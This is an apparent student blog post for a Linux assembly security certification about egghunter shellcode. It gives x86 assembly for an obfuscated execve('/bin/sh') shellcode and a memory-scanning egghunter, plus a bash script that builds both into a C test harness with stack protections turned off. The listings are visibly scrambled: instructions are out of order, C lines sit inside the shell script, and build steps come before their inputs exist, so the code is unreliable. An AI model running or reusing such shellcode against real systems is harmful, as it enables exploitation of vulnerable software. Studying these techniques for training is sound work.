3. Egghunter shellcode

The exam at Securitytube Linux Assembly Expert course consists of creating or analyzing shellcodes. This is the third assignment, where I have to create an egghunter shellcode, where the pattern is configurable.

For github files, check https://github.com/Z6543/My_SLAE/tree/master/03_egghunter

Usually during an exploit, there is not enough space for the shellcode. In order to solve this problem, one can split the shellcode into two parts. The first part includes the shellcode to be executed (which can't fit the space in the exploit), and the second part is the shellcode which can fit into the exploit, and start the original shellcode. But in order to start the shellcode, it has to be located in memory. The trick is that the shellcode to be executed starts with a magic string, duplicated, and the other shellcode searches for this string, twice. It has to be duplicated because otherwise the finder script could find itself.

Let's start with the /bin/sh shellcode

global _start   

db "eGGheGGh"  ;declare egghunter keyword
section .text
_start:
     

    ; Pushing //bin/sh
xor eax, eax
    push eax
 
 

    add esi, 0x22222222     ;push 0x68732f2f ;"sh//"
mov esi, 0x46510d0d     ;decode /bin/sh
    mov dword [esp-4], esi


    add esi, 0x22222112     ;push 0x6e69622f ;"nib/"
mov esi, 0x4c47411d     ;decode /bin/sh
    mov dword [esp-8], esi
    sub esp, 8              ;align esp 
    

    int 0x80
mov ebx, esp
 
    push eax
    mov edx, esp
 
    push ebx
    mov ecx, esp
 

    mov al, 11

And the so called egg-hunter shellcode:

global _start

 
section .text

    pop eax
_start:
_next:

     
inc eax
 
_isegg:

    cmp dword [eax-0x8],0x68474765 ;start egg
jne _next
 
    cmp dword [eax-0x4],0x68474765 ;end egg

    jmp eax ;execute our (not so tiny) shellcode
jne _next

 

And finally, the script to configure, build and run the shellcodes:

#!/bin/bash

echo 'Usage ./all_compile.sh source_file pattern E.g. ./all_compile.sh eggh shellcode patt where eggh.nasm is the source file'
patt=`echo -n $3| xxd -p|sed -r s/\([0-9a-f]{2}\)\([0-9a-f]{2}\)\([0-9a-f]{2}\)\([0-9a-f]{2}\)/\\\4\\\3\\\2\\\1/`

cp $1.nasm_ $1.nasm
echo pattern in reverse hex: $patt

cp $1.nasm $1.nasm_orig
sed s/0x68474765/0x$patt/g < $1.nasm > $1.nasm_


echo '[+] Assembling with Nasm ... '

for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode1.asm; done
nasm -f elf32 -o $1.o $1.nasm

echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o

echo '[+] Dumping shellcode ...'

echo '' > shellcode.asm


cp $2.nasm $2.nasm_orig

echo '[+] Dumping shellcode ...'
sed s/eGGh/$patt/g < $2.nasm > $2.nasm_

echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $2.o $2.nasm

echo '[+] Linking ...'
ld -melf_i386 -o $2 $2.o


echo '' > shellcode.asm

#include<stdio.h>
for i in `objdump -d $2 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode2.asm; done


echo '[+] Creating new shellcode.c ...'

cat > shellcode.c <<EOF
#include<string.h>
unsigned char egg_hunter[] ="\\
EOF
#echo -n "\\" >> shellcode.c

 printf("Length of shellcode is %d\n",strlen(code));
cat shellcode1.asm >> shellcode.c

cat >> shellcode.c <<EOF
";
unsigned char code[] ="\\
EOF
#echo -n "\\" >> shellcode.c
cat shellcode2.asm >> shellcode.c

cat >> shellcode.c <<EOF
";
main()
{
 printf("Length of egg_hunter is %d\n",strlen(egg_hunter));
 (*(void  (*)()) egg_hunter)();
 return 0;
}
EOF


echo '[+] Done! Run ./shellcode to execute!'
echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c

Let's test this!

Happy shell! :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student-ID: SLAE - 607